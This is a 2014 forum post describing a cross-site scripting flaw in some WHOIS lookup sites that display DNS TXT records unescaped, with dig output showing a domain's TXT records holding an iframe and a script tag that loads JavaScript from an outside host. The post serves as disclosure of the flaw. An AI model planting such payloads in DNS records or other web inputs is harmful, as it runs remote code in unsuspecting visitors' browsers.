XSS vulnerability in some WHOIS providers... via TXT records
Posted: Thu Sep 18, 2014 11:05 amThat's right, XSS vulnerabilities are present in some WHOIS providers. All you have to do is put something in the TXT record of a domain you control, and anyone who visits the appropriately affected site gets Rick-Rolled.
(XSS = Cross-site Scripting vulnerability.)
Here's what the onerous TXT record appears to be as of this writing:
(XSS = Cross-site Scripting vulnerability.)
Here's what the onerous TXT record appears to be as of this writing:
- Code: Select all
[gridlock:~]$ dig txt jamiehankins.co.uk
; <<>> DiG 9.9.2-P2 <<>> txt jamiehankins.co.uk
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22275
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;jamiehankins.co.uk. IN TXT
;; ANSWER SECTION:
jamiehankins.co.uk. 300 IN TXT "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
jamiehankins.co.uk. 300 IN TXT "v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk. 300 IN TXT "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk. 300 IN TXT "<script src='//peniscorp.com/topkek.js'></script>"
;; AUTHORITY SECTION:
jamiehankins.co.uk. 172800 IN NS hank.ns.cloudflare.com.
jamiehankins.co.uk. 172800 IN NS lucy.ns.cloudflare.com.
;; ADDITIONAL SECTION:
hank.ns.cloudflare.com. 12161 IN A 173.245.59.116
hank.ns.cloudflare.com. 12161 IN AAAA 2400:cb00:2049:1::adf5:3b74